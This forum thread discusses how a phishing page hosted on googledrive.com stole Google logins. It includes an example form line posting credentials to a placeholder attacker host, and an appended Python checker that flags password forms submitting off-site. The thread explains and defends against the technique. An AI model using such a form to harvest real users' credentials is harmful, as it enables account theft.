
After pressing "Sign in", the user’s credentials are sent to a PHP script on a compromised web server.

I might be missing something, but how does this part work?

Is it because the document in the Google Drive folder is actually a html document that the browser is loading (and executing javascript of)?




My guess would be:

Using something like: <form action="somebadsite.com/script.php">

So the credentials entered get submitted to the form which is sent via POST request to an external server. From there they can do whatever they want with the credentials (perhaps save them to a db) then redirect back to google docs.


AFAIK, it's not a legitimate login form. It's an attacker-created form that just looks like the login form. The trick is that they used Google Docs to host it on a .google.com server.


It wasn't actually hosted on a .google.com domain. It was googledrive.com, which is also owned by Google, but you should never expect a login form on that domain.


Thanks, the article was not very clear about that part.


It's probably using a form tag in the html. The data entered would be sent as a POST request to the external site.

Or it could be through JavaScript which would Ajax the data to the external site.


The latter would require a cross-domain Ajax request; I'm sure it is just a regular form POST.
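The off-site form POST the thread describes, as an added example that is not from the article or any commenter: a small Python check that parses a page and flags password-collecting forms whose action resolves to an origin other than the page that hosts them. The googledrive.com path and the somebadsite.example host in the sample are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit
# Constructed sample: a page served from the trusted hosting domain that carries a
# look-alike sign-in form whose action points at an attacker-controlled host.
PAGE_URL = "https://googledrive.com/host/FOLDER-ID-PLACEHOLDER/index.html"
SAMPLE_HTML = """
<html><body>
<form action="https://somebadsite.example/script.php" method="post">
  <input name="email"> <input name="passwd" type="password"> <button>Sign in</button>
</form>
<form action="search" method="get"><input name="q"></form>
</body></html>
"""

class FormCollector(HTMLParser):
    # Records each <form> with its resolved action and whether it collects a password.
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A relative or missing action resolves against the page URL, as the browser does.
            self._current = {
                "action": urljoin(self.page_url, a.get("action") or ""),
                "has_password": False,
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def origin(url):
    s = urlsplit(url)
    return (s.scheme.lower(), s.hostname, s.port)

def offsite_credential_forms(html, page_url):
    """Resolved actions of password forms that submit to an origin other than the page's."""
    p = FormCollector(page_url)
    p.feed(html)
    return [f["action"] for f in p.forms
            if f["has_password"] and origin(f["action"]) != origin(page_url)]
```

A form with a relative action (same origin as the hosting page) is not flagged; only the password form posting to the other host is reported.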



